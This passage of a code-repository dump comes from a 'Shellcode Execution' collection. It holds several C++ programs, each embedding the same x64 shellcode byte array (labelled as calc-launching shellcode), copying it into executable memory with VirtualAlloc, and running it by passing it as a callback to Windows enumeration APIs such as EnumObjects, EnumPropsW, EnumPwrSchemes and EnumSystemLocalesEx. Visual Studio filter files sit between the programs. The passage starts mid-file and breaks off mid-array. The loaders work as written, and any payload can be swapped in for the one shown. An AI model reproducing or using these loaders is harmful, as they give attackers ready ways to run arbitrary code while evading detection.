&op[0], sizeof(op)); 35 | 36 | 37 | EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)address, LGRPID_ARABIC, 0, 0); 38 | 39 | return 0; 40 | 41 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumObjects/EnumObjects.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | 
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | memcpy(address, &op[0], sizeof(op)); 34 | 35 | 36 | LOGFONTW lf = { 0 }; 37 | lf.lfCharSet = DEFAULT_CHARSET; 38 | 39 | 40 | HDC dc = GetDC(NULL); 41 | EnumObjects(dc, OBJ_BRUSH, (GOBJENUMPROC)address, NULL); 42 | 43 | return 0; 44 | 45 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumObjects/EnumObjects.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumPageFilesW/EnumPageFilesW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // alfarom256 calc shellcode 6 | unsigned char op[] = 7 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 8 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 9 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 10 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 11 | 
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 12 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 13 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 14 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 15 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 16 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 17 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 18 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 19 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 20 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 21 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 22 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 23 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 24 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 25 | "\x63\x2e\x65\x78\x65\x00"; 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | ::RtlMoveMemory(addr, op, sizeof(op)); 34 | 35 | ::EnumPageFilesW((PENUM_PAGE_FILE_CALLBACKW)addr, NULL); 36 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumPageFilesW/EnumPageFilesW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode 
Execution/EnumPropsEx/EnumPropsEx.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | int err(const char* errmsg) { 6 | 7 | 8 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 9 | return 1; 10 | 11 | } 12 | 13 | // alfarom256 calc shellcode 14 | unsigned char op[] = 15 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 16 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 17 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 18 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 19 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 20 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 21 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 22 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 23 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 24 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 25 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 26 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 27 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 28 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 29 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 30 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 31 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 33 | "\x63\x2e\x65\x78\x65\x00"; 34 | 35 | 36 | 37 | int main() { 38 | 39 | 40 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 41 | ::RtlMoveMemory(addr, op, sizeof(op)); 42 | 43 | HWND dummy = ::GetTopWindow(NULL); 44 | ::EnumPropsExW(dummy, (PROPENUMPROCEXW)addr, NULL); 45 | 46 | 47 | } -------------------------------------------------------------------------------- /Shellcode 
Execution/EnumPropsEx/EnumPropsEx.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumPropsW/EnumPropsW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | 
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | int main() { 29 | 30 | 31 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 32 | ::RtlMoveMemory(addr, op, sizeof(op)); 33 | 34 | HWND dummy = ::GetTopWindow(NULL); 35 | ::EnumPropsW(dummy, (PROPENUMPROCW)addr); 36 | 37 | return 0; 38 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumPropsW/EnumPropsW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumPwrSchemes/EnumPwrSchemes.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "PowrProf.lib") 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 
18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | 32 | int main() { 33 | 34 | 35 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 36 | memcpy(address, &op[0], sizeof(op)); 37 | 38 | 39 | ::EnumPwrSchemes((PWRSCHEMESENUMPROC)address, NULL); 40 | 41 | return 0; 42 | 43 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumPwrSchemes/EnumPwrSchemes.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumResourceTypesExW/EnumResourceTypesExW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #pragma comment(lib, "KtmW32.lib") 7 | 8 | // alfarom256 calc shellcode 9 | unsigned char op[] = 10 | 
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 11 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 12 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 13 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 14 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 15 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 16 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 17 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 18 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 19 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 20 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 21 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 22 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 23 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 24 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 25 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 26 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 27 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 28 | "\x63\x2e\x65\x78\x65\x00"; 29 | 30 | 31 | 32 | 33 | int main() { 34 | 35 | 36 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 37 | memcpy(address, &op[0], sizeof(op)); 38 | 39 | EnumResourceTypesExW(::LoadLibraryW(L"Kernel32.dll"), (ENUMRESTYPEPROCW)address, NULL, RESOURCE_ENUM_VALIDATE, NULL); 40 | 41 | return 0; 42 | 43 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | 
{93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumResourceTypesW/EnumResourceTypesW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | 6 | int err(const char* errmsg) { 7 | 8 | 9 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 10 | return 1; 11 | 12 | } 13 | 14 | // alfarom256 calc shellcode 15 | unsigned char op[] = 16 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 17 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 18 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 19 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 20 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 21 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 22 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 23 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 24 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 25 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 26 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 27 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 28 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 29 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 30 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 31 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 32 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 33 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 34 | "\x63\x2e\x65\x78\x65\x00"; 35 | 36 
| 37 | 38 | int main() { 39 | 40 | 41 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 42 | ::RtlMoveMemory(addr, op, sizeof(op)); 43 | 44 | ::EnumResourceTypesW(::LoadLibraryW(L"Kernel32.dll"), (ENUMRESTYPEPROCW)addr, NULL); 45 | 46 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumResourceTypesW/EnumResourceTypesW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumSystemLocales/EnumSystemLocales.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | 
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | memcpy(address, &op[0], sizeof(op)); 34 | 35 | ::EnumSystemLocalesEx((LOCALE_ENUMPROCEX)address, LOCALE_ALL, NULL, NULL); 36 | return 0; 37 | 38 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumSystemLocales/EnumSystemLocales.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumThreadWindows/EnumThreadWindows.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | 